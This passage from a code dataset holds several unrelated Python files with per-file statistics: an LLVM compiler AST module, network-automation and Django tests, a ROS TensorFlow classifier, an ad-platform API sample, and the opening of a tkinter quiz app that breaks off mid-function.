| 34.847744 | 87 | 0.663089 | 2,358 | 18,539 | 5.000848 | 0.126378 | 0.022388 | 0.023745 | 0.017809 | 0.654003 | 0.629834 | 0.572676 | 0.538755 | 0.520353 | 0.490926 | 0 | 0.004936 | 0.246022 | 18,539 | 531 | 88 | 34.913371 | 0.838675 | 0.349426 | 0 | 0.348684 | 0 | 0.003289 | 0.14256 | 0.016302 | 0 | 0 | 0 | 0.001883 | 0 | 1 | 0.055921 | false | 0 | 0.046053 | 0.003289 | 0.134868 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41a3f81d4c1f4c13d941abba84f2c1450266e8a1 | 7,951 | py | Python | compyler/node.py | Fogelman/compyler | 76c6ba12f264131b6a5d800dd40bb76fe3155900 | [
"MIT"
] | null | null | null | compyler/node.py | Fogelman/compyler | 76c6ba12f264131b6a5d800dd40bb76fe3155900 | [
"MIT"
] | null | null | null | compyler/node.py | Fogelman/compyler | 76c6ba12f264131b6a5d800dd40bb76fe3155900 | [
"MIT"
] | null | null | null |
from llvmlite import ir
from rply.token import BaseBox
from abc import ABC, abstractmethod
import operator as op
from compyler.symboltable import FunctionSymbol, SymbolTable
class Node(BaseBox, ABC):
def __init__(self, value, children=None):
self.value = value
self.children = children
if children is None:
self.children = list()
@abstractmethod
def Evaluate(self, context):
pass
class Context(object):
def __init__(self, st, builder, module, env=dict()):
self.st = st
self.builder = builder
self.module = module
self.env = env
self.local = dict()
def new(self):
st = SymbolTable(parent=self.st)
builder = self.builder
module = self.module
env = self.env
return Context(st, builder, module, env)
def declare(self, name):
"""Create an alloca in the entry BB of the current function."""
int32 = ir.IntType(32)
return self.builder.alloca(int32, name=name)
class UnOp(Node):
op_map = {
'+': lambda builder, x: x,
'-': lambda builder, x: builder.neg(x, "unoptmp"),
'~': lambda builder, x: builder.not_(x, "unoptmp"),
'not': lambda builder, x: builder.not_(x, "unoptmp"),
}
def Evaluate(self, context):
return self.op_map[self.value](context.builder, self.children[0].Evaluate(context))
class BinOp(Node):
op_map = {
'+': lambda builder, x, y: builder.add(x, y, "optmp"),
'-': lambda builder, x, y: builder.sub(x, y, "optmp"),
'*': lambda builder, x, y: builder.mul(x, y, "optmp"),
'^': lambda builder, x, y: builder.xor(x, y, "optmp"),
'/': lambda builder, x, y: builder.sdiv(x, y, "optmp"),
'//': lambda builder, x, y: builder.sdiv(x, y, "optmp"),
'%': lambda builder, x, y: builder.srem(x, y, "optmp"),
'&': lambda builder, x, y: builder.and_(x, y, "optmp"),
'|': lambda builder, x, y: builder.or_(x, y, "optmp"),
'<': lambda builder, x, y: builder.icmp_signed("<", x, y, "optmp"),
'>': lambda builder, x, y: builder.icmp_signed(">", x, y, "optmp"),
'<=': lambda builder, x, y: builder.icmp_signed("<=", x, y, "optmp"),
'>=': lambda builder, x, y: builder.icmp_signed(">=", x, y, "optmp"),
'==': lambda builder, x, y: builder.icmp_signed("==", x, y, "optmp"),
'!=': lambda builder, x, y: builder.icmp_signed("!=", x, y, "optmp"),
'and': lambda builder, x, y: builder.and_(x, y, "optmp"),
}
def Evaluate(self, context):
return self.op_map[self.value](context.builder, self.children[0].Evaluate(context), self.children[1].Evaluate(context))
class IntVal(Node):
def Evaluate(self, context):
int32 = ir.IntType(32)
return ir.Constant(int32, int(self.value))
class BoolVal(Node):
def Evaluate(self, context):
int32 = ir.IntType(32)
return ir.Constant(int32, int(self.value == "True"))
class AnyVal(Node):
def Evaluate(self, context):
return (self.value)
class NoOp(Node):
def Evaluate(self, context):
pass
class Assignment(Node):
def Evaluate(self, context):
addr = context.st.contains(self.value)
if not addr:
addr = context.declare(self.value)
x = self.children[0].Evaluate(context)
context.builder.store(x, addr)
context.st.set(self.value, addr)
class Identifier(Node):
def Evaluate(self, context):
addr = context.st.get(self.value)
return context.builder.load(addr)
class Print(Node):
def Evaluate(self, context):
int8 = ir.IntType(8).as_pointer()
printf = context.env["printf"]
ftm = context.env["ftm"]
if context.local.__contains__("print"):
arg = context.local["print"]
else:
arg = context.builder.bitcast(ftm, int8)
context.local["print"] = arg
result = self.children[0].Evaluate(context)
context.builder.call(printf, [arg, result])
class If(Node):
def Evaluate(self, context):
int32 = ir.IntType(32)
condition = self.children[0].Evaluate(context)
pred = context.builder.icmp_signed(
'!=', condition, ir.Constant(int32, 0))
with context.builder.if_else(pred) as (then, otherwise):
with then:
self.children[1].Evaluate(context)
with otherwise:
if len(self.children) > 2:
self.children[2].Evaluate(context)
class While(Node):
def Evaluate(self, context):
int32 = ir.IntType(32)
loop = context.builder.function.append_basic_block('loop')
context.builder.branch(loop)
context.builder.position_at_start(loop)
self.children[1].Evaluate(context)
endcond = self.children[0].Evaluate(context)
cmp = context.builder.icmp_signed(
'!=', endcond, ir.Constant(int32, 0),
'loopcond')
after = context.builder.function.append_basic_block('afterloop')
context.builder.cbranch(cmp, loop, after)
context.builder.position_at_start(after)
class ReadLine(Node):
def Evaluate(self, context):
return int(input())
class Commands(Node):
def Evaluate(self, context, check=False):
for child in self.children:
child.Evaluate(context)
if check and len(self.children) > 0 and isinstance(self.children[-1], (Return)):
context.local["ret"] = ""
def append(self, child):
self.children.append(child)
class FuncAssignment(Node):
def _create(self, context):
int32 = ir.IntType(32)
args, _ = self.children
ty = ir.FunctionType(int32, [int32 for i in range(len(args))])
if self.value in context.module.globals:
existing_func = context.module[self.value]
if not isinstance(existing_func, ir.Function):
raise Exception('Function/Global name collision', self.value)
if not existing_func.is_declaration():
raise Exception('Redifinition of {0}'.format(self.value))
if len(existing_func.function_type.args) != len(ty.args):
raise Exception(
'Redifinition with different number of arguments')
func = context.module.globals[self.value]
else:
# Otherwise create a new function
func = ir.Function(context.module, ty, self.value)
return func
def Evaluate(self, parent):
args, body = self.children
context = parent.new()
func = self._create(context)
block = func.append_basic_block('entry')
context.builder = ir.IRBuilder(block)
for i, arg in enumerate(func.args):
arg.name = args[i]
addr = context.declare(arg.name)
context.builder.store(arg, addr)
context.st.set(arg.name, addr)
body.Evaluate(context, True)
if not context.local.__contains__("ret"):
context.builder.ret(ir.Constant(ir.IntType(32), 0))
return func
class FuncCall(Node):
def Evaluate(self, context):
arguments = self.children
func = context.module.get_global(self.value)
if func is None or not isinstance(func, ir.Function):
raise Exception('Call to unknown function', self.value)
if len(func.args) != len(arguments):
raise Exception('Call argument length mismatch', self.value)
call_args = [argument.Evaluate(context) for argument in arguments]
return context.builder.call(func, call_args, 'calltmp')
class Return(Node):
def Evaluate(self, context):
if self.children is None or len(self.children) == 0:
return context.builder.ret_void()
return context.builder.ret(self.children[0].Evaluate(context))
| 30.003774 | 127 | 0.599673 | 973 | 7,951 | 4.840699 | 0.169579 | 0.013588 | 0.059448 | 0.074735 | 0.392994 | 0.303822 | 0.244586 | 0.213163 | 0.171975 | 0.140552 | 0 | 0.010604 | 0.264621 | 7,951 | 264 | 128 | 30.117424 | 0.794938 | 0.011319 | 0 | 0.169399 | 0 | 0 | 0.045837 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125683 | false | 0.010929 | 0.027322 | 0.021858 | 0.338798 | 0.027322 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41a41dfe04ba1695c5ba79a312ffef30febd8cc6 | 2,617 | py | Python | tests/test_gnmi.py | dmulyalin/nornir-salt | 184002995515dddc802b578400370c2219e94957 | [
"MIT"
] | 5 | 2021-01-22T09:34:55.000Z | 2021-12-22T08:12:34.000Z | tests/test_gnmi.py | dmulyalin/nornir-salt | 184002995515dddc802b578400370c2219e94957 | [
"MIT"
] | 2 | 2022-01-27T14:46:40.000Z | 2022-02-28T16:59:01.000Z | tests/test_gnmi.py | dmulyalin/nornir-salt | 184002995515dddc802b578400370c2219e94957 | [
"MIT"
] | 1 | 2021-01-10T04:37:08.000Z | 2021-01-10T04:37:08.000Z | """
At the moment this does not tests apat from testing import of PyGNMI library and gNMI
connecton and task plugins.
Was not able to find always-on endpoints that can test using gNMI, Cisco sandboxes has gRPC
API available but that is different.
"""
import sys
import pprint
import logging
import yaml
import pytest
import socket
sys.path.insert(0, "..")
try:
from nornir import InitNornir
from nornir.core.plugins.inventory import InventoryPluginRegister
from nornir.core.plugins.connections import ConnectionPluginRegister
from nornir.core.task import Result
HAS_NORNIR = True
except ImportError:
HAS_NORNIR = False
from nornir_salt import (
ResultSerializer, DictInventory, nr_test,
DataProcessor, netmiko_send_commands,
PyGNMIPlugin, pygnmi_call
)
logging.basicConfig(level=logging.ERROR)
InventoryPluginRegister.register("DictInventory", DictInventory)
ConnectionPluginRegister.register("pygnmi", PyGNMIPlugin)
skip_if_no_nornir = pytest.mark.skipif(
HAS_NORNIR == False,
reason="Failed to import all required Nornir modules and plugins",
)
# ---------------------------------------------------
# cisco always on ios xr lab details
# ---------------------------------------------------
cisco_iosxr_always_on_router = """
hosts:
sandbox-iosxr-1.cisco.com:
hostname: "sandbox-iosxr-1.cisco.com"
platform: iosxr
username: admin
password: C1sco12345
port: 57777
connection_options:
pygnmi:
extras:
insecure: True
"""
try:
s = socket.socket()
s.settimeout(1)
s.connect(("sandbox-iosxr-1.cisco.com", 22))
has_connection_to_cisco_iosxr_always_on_router = True
except:
has_connection_to_cisco_iosxr_always_on_router = False
skip_if_has_no_cisco_iosxr_always_on_router = pytest.mark.skipif(
has_connection_to_cisco_iosxr_always_on_router == False,
reason="Has no connection to sandbox-iosxr-1.cisco.com router",
)
cisco_iosxr_always_on_router_dict = yaml.safe_load(cisco_iosxr_always_on_router)
def init(opts):
"""
Initiate nornir by calling InitNornir()
"""
nr = InitNornir(
logging={"enabled": False},
runner={"plugin": "serial"},
inventory={
"plugin": "DictInventory",
"options": {
"hosts": opts["hosts"],
"groups": opts.get("groups", {}),
"defaults": opts.get("defaults", {}),
},
},
)
return nr
nr = init(cisco_iosxr_always_on_router_dict)
@skip_if_no_nornir
def test_gnmi_capabilities_check():
pass
# test_gnmi_capabilities_check()
| 25.910891 | 91 | 0.680168 | 313 | 2,617 | 5.466454 | 0.41853 | 0.046756 | 0.07481 | 0.084161 | 0.19813 | 0.106955 | 0.074226 | 0.074226 | 0.051432 | 0 | 0 | 0.008996 | 0.192969 | 2,617 | 100 | 92 | 26.17 | 0.801136 | 0.173481 | 0 | 0.028571 | 0 | 0 | 0.22321 | 0.048198 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028571 | false | 0.028571 | 0.185714 | 0 | 0.228571 | 0.014286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41a614b41c6ed87485f48e036058ce573a7b945d | 690 | py | Python | src/tests/benchmarks/tools/bench/AnTuTu6.py | VirtualVFix/AndroidTestFramework | 1feb769c6aca39a78e6daefd6face0a1e4d62cd4 | [
"MIT"
] | null | null | null | src/tests/benchmarks/tools/bench/AnTuTu6.py | VirtualVFix/AndroidTestFramework | 1feb769c6aca39a78e6daefd6face0a1e4d62cd4 | [
"MIT"
] | null | null | null | src/tests/benchmarks/tools/bench/AnTuTu6.py | VirtualVFix/AndroidTestFramework | 1feb769c6aca39a78e6daefd6face0a1e4d62cd4 | [
"MIT"
] | null | null | null | # All rights reserved by forest fairy.
# You cannot modify or share anything without sacrifice.
# If you don't agree, keep calm and don't look at code bellow!
__author__ = "VirtualV <https://github.com/virtualvfix>"
__date__ = "$Apr 12, 2014 4:40:25 PM$"
import ast
from tests.benchmarks.tools.base import App
class AnTuTu6(App):
""" AnTuTu 6 """
def __init__(self, attributes, serial):
App.__init__(self, attributes, serial)
def collect_results(self, res_doc):
raw_res = ast.literal_eval(self.getResults())
for name, value in raw_res:
res_doc.add_name(name.replace('[','').replace(']',''))
res_doc.add_result(value)
| 31.363636 | 66 | 0.665217 | 97 | 690 | 4.474227 | 0.731959 | 0.041475 | 0.082949 | 0.110599 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023853 | 0.210145 | 690 | 21 | 67 | 32.857143 | 0.772477 | 0.236232 | 0 | 0 | 0 | 0 | 0.131274 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0 | 0.416667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41a6d2898476c90a1f687ee05cacf8a8f146ec52 | 1,496 | py | Python | osc_bge/users/admin.py | jisuhan3201/osc-bge | 125c441d23d7f1fdb2d9b8f42f859082e757e25a | [
"MIT"
] | null | null | null | osc_bge/users/admin.py | jisuhan3201/osc-bge | 125c441d23d7f1fdb2d9b8f42f859082e757e25a | [
"MIT"
] | 5 | 2020-06-05T19:49:47.000Z | 2021-09-08T00:50:55.000Z | osc_bge/users/admin.py | jisuhan3201/osc-bge | 125c441d23d7f1fdb2d9b8f42f859082e757e25a | [
"MIT"
] | null | null | null | from django.contrib import admin
from django.contrib.auth import admin as auth_admin
from django.contrib.auth import get_user_model
from osc_bge.users.forms import UserChangeForm, UserCreationForm
from . import models
User = get_user_model()
@admin.register(User)
class UserAdmin(auth_admin.UserAdmin):
form = UserChangeForm
add_form = UserCreationForm
fieldsets = (("User", {"fields": ("username", "image", "type")}),) + auth_admin.UserAdmin.fieldsets
list_display = ["username", "is_superuser", "type", "image"]
search_fields = ["username"]
@admin.register(models.BgeAdminUser)
class BgeAdminUserAdmin(admin.ModelAdmin):
list_display = (
"user",
"partition",
)
@admin.register(models.BgeBranchAdminUser)
class BgeBranchAdminUserAdmin(admin.ModelAdmin):
list_display = (
"user",
"branch",
)
@admin.register(models.BgeBranchCoordinator)
class BgeBranchCoordinatorAdmin(admin.ModelAdmin):
list_display = (
"user",
"branch",
"position",
)
@admin.register(models.AgencyHeadAdminUser)
class AgencyHeadAdminUserAdmin(admin.ModelAdmin):
list_display = (
"user",
"agency_head",
)
@admin.register(models.AgencyAdminUser)
class AgencyAdminUserAdmin(admin.ModelAdmin):
list_display = (
"user",
"agency",
)
@admin.register(models.Counselor)
class CounselorAdmin(admin.ModelAdmin):
list_display = (
"user",
"agency",
)
| 22 | 103 | 0.681818 | 144 | 1,496 | 6.951389 | 0.347222 | 0.090909 | 0.113886 | 0.155844 | 0.273726 | 0.243756 | 0 | 0 | 0 | 0 | 0 | 0 | 0.198529 | 1,496 | 67 | 104 | 22.328358 | 0.834862 | 0 | 0 | 0.32 | 0 | 0 | 0.093583 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.46 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41a79266ccd514b38d38bed6f38f0c721bb4fe9e | 3,949 | py | Python | scripts/ros_tensorflow_classify.py | xuanlvxin/blog_backup | 691c040efe4d752b4c4badbdd5dd78960ed966e2 | [
"Apache-2.0"
] | 45 | 2018-05-13T01:55:40.000Z | 2022-03-28T15:20:48.000Z | scripts/ros_tensorflow_classify.py | xuanlvxin/blog_backup | 691c040efe4d752b4c4badbdd5dd78960ed966e2 | [
"Apache-2.0"
] | 1 | 2018-06-06T10:39:02.000Z | 2018-09-05T01:52:19.000Z | scripts/ros_tensorflow_classify.py | xuanlvxin/blog_backup | 691c040efe4d752b4c4badbdd5dd78960ed966e2 | [
"Apache-2.0"
] | 17 | 2018-05-14T12:17:57.000Z | 2020-03-29T09:41:07.000Z | #!/usr/bin/env python
import rospy
from sensor_msgs.msg import Image
from std_msgs.msg import String
from cv_bridge import CvBridge
import cv2
import numpy as np
import tensorflow as tf
import os
import re
class RosTensorFlow():
def __init__(self):
self._session = tf.Session()
self._cv_bridge = CvBridge()
self._sub = rospy.Subscriber('usb_cam/image_raw', Image, self.callback, queue_size=1)
self._pub = rospy.Publisher('/result_ripe', String, queue_size=1)
self.score_threshold = rospy.get_param('~score_threshold', 0.1)
self.use_top_k = rospy.get_param('~use_top_k', 5)
def load(self, label_lookup_path, uid_lookup_path):
if not tf.gfile.Exists(uid_lookup_path):
tf.logging.fatal('File does not exist %s', uid_lookup_path)
if not tf.gfile.Exists(label_lookup_path):
tf.logging.fatal('File does not exist %s', label_lookup_path)
# Loads mapping from string UID to human-readable string
proto_as_ascii_lines = tf.gfile.GFile(uid_lookup_path).readlines()
uid_to_human = {}
p = re.compile(r'[n\d]*[ \S,]*')
for line in proto_as_ascii_lines:
parsed_items = p.findall(line)
uid = parsed_items[0]
human_string = parsed_items[2]
uid_to_human[uid] = human_string
# Loads mapping from string UID to integer node ID.
node_id_to_uid = {}
proto_as_ascii = tf.gfile.GFile(label_lookup_path).readlines()
for line in proto_as_ascii:
if line.startswith(' target_class:'):
target_class = int(line.split(': ')[1])
if line.startswith(' target_class_string:'):
target_class_string = line.split(': ')[1]
node_id_to_uid[target_class] = target_class_string[1:-2]
# Loads the final mapping of integer node ID to human-readable string
node_id_to_name = {}
for key, val in node_id_to_uid.items():
if val not in uid_to_human:
tf.logging.fatal('Failed to locate: %s', val)
name = uid_to_human[val]
node_id_to_name[key] = name
return node_id_to_name
def callback(self, image_msg):
cv_image = self._cv_bridge.imgmsg_to_cv2(image_msg, "bgr8")
image_data = cv2.imencode('.jpg', cv_image)[1].tostring()
# Creates graph from saved GraphDef.
softmax_tensor = self._session.graph.get_tensor_by_name('softmax:0')
predictions = self._session.run(
softmax_tensor, {'DecodeJpeg/contents:0': image_data})
predictions = np.squeeze(predictions)
# Creates node ID --> English string lookup.
node_lookup = self.load(PATH_TO_LABELS, PATH_TO_UID)
top_k = predictions.argsort()[-self.use_top_k:][::-1]
for node_id in top_k:
if node_id not in node_lookup:
human_string = ''
else:
human_string = node_lookup[node_id]
score = predictions[node_id]
if score > self.score_threshold:
rospy.loginfo('%s (score = %.5f)' % (human_string, score))
self._pub.publish(human_string)
def main(self):
rospy.spin()
if __name__ == '__main__':
ROOT_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
PATH_TO_CKPT = ROOT_PATH + '/include/classifier/classify_image_graph_def.pb'
PATH_TO_LABELS = ROOT_PATH + '/include/classifier/imagenet_2012_challenge_label_map_proto.pbtxt'
PATH_TO_UID = ROOT_PATH + '/include/classifier/imagenet_synset_to_human_label_map.txt'
with tf.gfile.FastGFile(PATH_TO_CKPT, 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
_ = tf.import_graph_def(graph_def, name='')
rospy.init_node('ros_tensorflow_classify')
tensor = RosTensorFlow()
tensor.main()
| 37.971154 | 100 | 0.640669 | 541 | 3,949 | 4.35305 | 0.286506 | 0.033121 | 0.023779 | 0.014013 | 0.152866 | 0.101911 | 0.061147 | 0.061147 | 0.03482 | 0.03482 | 0 | 0.008144 | 0.253735 | 3,949 | 103 | 101 | 38.339806 | 0.790974 | 0.068625 | 0 | 0 | 0 | 0 | 0.117375 | 0.058279 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051948 | false | 0 | 0.12987 | 0 | 0.207792 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41a7a2ca9d0dcc0caead7e8e09caea9c36c46387 | 3,075 | py | Python | python/v1/generate_default_line_item.py | googleads/googleads-displayvideo-examples | cd1b4b3bc63e068fef4ff23264232a65f70207b5 | [
"Apache-2.0"
] | 2 | 2021-10-08T12:10:38.000Z | 2022-01-23T16:00:12.000Z | python/v1/generate_default_line_item.py | googleads/googleads-displayvideo-examples | cd1b4b3bc63e068fef4ff23264232a65f70207b5 | [
"Apache-2.0"
] | 1 | 2021-04-09T16:34:06.000Z | 2021-04-12T14:42:00.000Z | python/v1/generate_default_line_item.py | googleads/googleads-displayvideo-examples | cd1b4b3bc63e068fef4ff23264232a65f70207b5 | [
"Apache-2.0"
] | 4 | 2021-05-20T17:55:54.000Z | 2022-02-10T14:13:40.000Z | #!/usr/bin/python
#
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example generates a default line item under the given insertion order.
The line item will inherit settings, including targeting, from the insertion order. If generating a
Mobile App Install line item, an app ID must be provided.
"""
import argparse
import os
import sys
from googleapiclient.errors import HttpError
sys.path.insert(0, os.path.abspath('..'))
import samples_util
# Declare command-line flags.
argparser = argparse.ArgumentParser(add_help=False)
argparser.add_argument(
'advertiser_id', help='The ID of the parent advertiser of the line item to be created.')
argparser.add_argument(
'insertion_order_id', help='The ID of the insertion order of the line item to be created.')
argparser.add_argument(
'display_name', help='The display name of the line item to be created.')
argparser.add_argument(
'line_item_type', help='The type of the line item to be created.')
argparser.add_argument(
'--app_id',
help='The app ID of the mobile app promoted by the line item. Required and only valid if line '
'item type is either LINE_ITEM_TYPE_DISPLAY_MOBILE_APP_INSTALL or '
'LINE_ITEM_TYPE_VIDEO_MOBILE_APP_INSTALL.')
def main(service, flags):
# Create and populate the generateDefault request body.
generate_default_line_item_request = {
'insertionOrderId': flags.insertion_order_id,
'displayName': flags.display_name,
'lineItemType': flags.line_item_type
}
# Add Mobile App object to request generating a Mobile App Install
# line item.
if flags.line_item_type in [
'LINE_ITEM_TYPE_DISPLAY_MOBILE_APP_INSTALL',
'LINE_ITEM_TYPE_VIDEO_MOBILE_APP_INSTALL'
]:
if not flags.app_id:
print('Error: No app ID given for Mobile App Install line item. Exiting.')
sys.exit(1)
generate_default_line_item_request['mobileApp'] = {'appId': flags.app_id}
try:
# Build and execute request.
response = service.advertisers().lineItems().generateDefault(
advertiserId=flags.advertiser_id, body=generate_default_line_item_request).execute()
except HttpError as e:
print(e)
sys.exit(1)
# Display the new line item resource name.
print(f'Line Item {response["name"]} was created.')
if __name__ == '__main__':
# Retrieve command line arguments.
flags = samples_util.get_arguments(sys.argv, __doc__, parents=[argparser])
# Authenticate and construct service.
service = samples_util.get_service(version='v1')
main(service, flags)
| 33.791209 | 99 | 0.744715 | 446 | 3,075 | 4.964126 | 0.363229 | 0.083108 | 0.04336 | 0.036134 | 0.242096 | 0.217706 | 0.172538 | 0.079494 | 0.079494 | 0.079494 | 0 | 0.004706 | 0.170732 | 3,075 | 90 | 100 | 34.166667 | 0.863529 | 0.355772 | 0 | 0.155556 | 0 | 0 | 0.369365 | 0.08248 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022222 | false | 0 | 0.111111 | 0 | 0.133333 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41a92c8d5a10768f359c0ce9e4aa075658259077 | 3,897 | py | Python | datacombine/tests/test_models.py | Crimson-Star-Software/data-combine | 3209ae2316afc38417e51c3261494d6e7d2e4e2a | [
"MIT"
] | null | null | null | datacombine/tests/test_models.py | Crimson-Star-Software/data-combine | 3209ae2316afc38417e51c3261494d6e7d2e4e2a | [
"MIT"
] | 3 | 2020-02-11T23:14:53.000Z | 2021-06-10T18:32:57.000Z | datacombine/tests/test_models.py | Crimson-Star-Software/data-combine | 3209ae2316afc38417e51c3261494d6e7d2e4e2a | [
"MIT"
] | null | null | null | from django.test import TestCase
from datacombine import models as dcmodels
from collections import namedtuple
from django.core.exceptions import FieldError
import re
Match = namedtuple("Match", ["object", "regex", "match"])
class PhoneTestCase(TestCase):
def setUp(self):
dcmodels.Phone.objects.create(area_code="407", number="5559999")
dcmodels.Phone.objects.create(number="1234567")
dcmodels.Phone.objects.create(number="3141592", extension="48")
dcmodels.Phone.objects.create(
area_code="904", number="3141592", extension="2"
)
def test_str(self):
all_phone_nums = dcmodels.Phone.objects.all()
matches = []
for num in all_phone_nums:
regex_str = ""
if getattr(num, 'area_code', None):
regex_str += "\([0-9]{3}\)\-"
regex_str += "[0-9]{3}\-[0-9]{4}"
if getattr(num, "extension", None):
regex_str += " x [0-9]+"
match = True if re.match(regex_str, str(num)) else False
matches.append(Match(num, regex_str, match))
ms = all([m.match for m in matches])
if not ms:
for m in matches:
if not m.match:
print(f"Failure on {m.object} with {m.regex}")
self.assertTrue(ms)
def test_phone_create_from_str_1_block_7_digit(self):
ph = dcmodels.Phone()
ph.create_from_str("1234567")
self.assertEqual(ph.number, "1234567")
def test_phone_create_from_str_2_block_7_digit(self):
ph = dcmodels.Phone()
ph.create_from_str("123-4567")
self.assertEqual(ph.number, "1234567")
def test_phone_create_from_str_2_block_bad_7_digit(self):
ph = dcmodels.Phone()
ph.create_from_str("12-34567")
self.assertEqual(ph.number, "1234567")
def test_phone_create_from_str_3_block_bad_7_digit(self):
ph = dcmodels.Phone()
ph.create_from_str("(123)-45-67")
self.assertEqual(ph.number, "1234567")
def test_phone_create_from_average_str(self):
ph = dcmodels.Phone()
ph.create_from_str("(407)-666-9999")
self.assertTrue(ph.area_code == "407" and ph.number == "6669999")
def test_phone_create_from_average_str_with_ext(self):
ph = dcmodels.Phone()
ph.create_from_str("(407)-666-9999 x 49")
self.assertTrue(ph.area_code == "407" and ph.number == "6669999"\
and ph.extension == "49")
def test_phone_create_from_str_too_few_numbers(self):
ph = dcmodels.Phone()
with self.assertRaises(FieldError):
ph.create_from_str("1")
def test_phone_create_from_str_null(self):
ph = dcmodels.Phone()
ph.create_from_str("")
self.assertTrue(ph.area_code == ph.number == ph.extension == None)
def test_null_phone_is_none(self):
ph = dcmodels.Phone()
ph.create_from_str("")
self.assertTrue(ph == None)
def tearDown(self):
dcmodels.Phone.objects.all().delete()
class ContactTestCase(TestCase):
def setUp(self):
dcmodels.Phone.objects.create(area_code="407", number="5559999")
dcmodels.Phone.objects.create(number="1234567")
dcmodels.Phone.objects.create(number="3141592", extension="48")
dcmodels.Phone.objects.create(
area_code="904", number="3141592", extension="2"
)
dcmodels.EmailAddress.objects.create(
confirm_status=dcmodels.NO_CONFIRMATION_REQUIRED,
email_address='pastor@stnerp.org',
cc_id='a09d1c20-6aac-11e3-8c26-982bcb740129',
opt_in_date='2011-06-27T18:47:16.000Z',
opt_in_source=dcmodels.ACTION_BY_OWNER,
status=dcmodels.ACTIVE
)
def test_get_email_addresses(self):
self.assertTrue(len(dcmodels.EmailAddress.objects.all()) == 1)
| 36.083333 | 74 | 0.628689 | 501 | 3,897 | 4.664671 | 0.255489 | 0.105691 | 0.08344 | 0.073171 | 0.560548 | 0.547711 | 0.500214 | 0.482242 | 0.482242 | 0.482242 | 0 | 0.079037 | 0.243521 | 3,897 | 107 | 75 | 36.420561 | 0.713704 | 0 | 0 | 0.303371 | 0 | 0 | 0.098794 | 0.015396 | 0 | 0 | 0 | 0 | 0.123596 | 1 | 0.157303 | false | 0 | 0.05618 | 0 | 0.235955 | 0.011236 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41a9a2d818ad02b61cfd18575ed9cdd4ecccdb57 | 36,453 | py | Python | Capture the Flag/FirstRound.py | yokesh-git/Quiz-Application | 2b990ee9f711d05956e76ade0550bfa1abd86b08 | [
"MIT"
] | null | null | null | Capture the Flag/FirstRound.py | yokesh-git/Quiz-Application | 2b990ee9f711d05956e76ade0550bfa1abd86b08 | [
"MIT"
] | null | null | null | Capture the Flag/FirstRound.py | yokesh-git/Quiz-Application | 2b990ee9f711d05956e76ade0550bfa1abd86b08 | [
"MIT"
] | null | null | null | from tkinter import *
from firebase import firebase
from PIL import Image, ImageTk
fbconn = firebase.FirebaseApplication('https://samplefbtest-266bd.firebaseio.com/',None)
global crtans
crtans = 0
class FirstRound:
print("Done")
def __init__(self, master):
global w,h,ws,hs,x,y
w = 1000
h = 650
ws = root.winfo_screenwidth() # width of the screen
hs = root.winfo_screenheight() # height of the screen
x = (ws/4) - (w/4)
y = (hs/4) - (h/4)
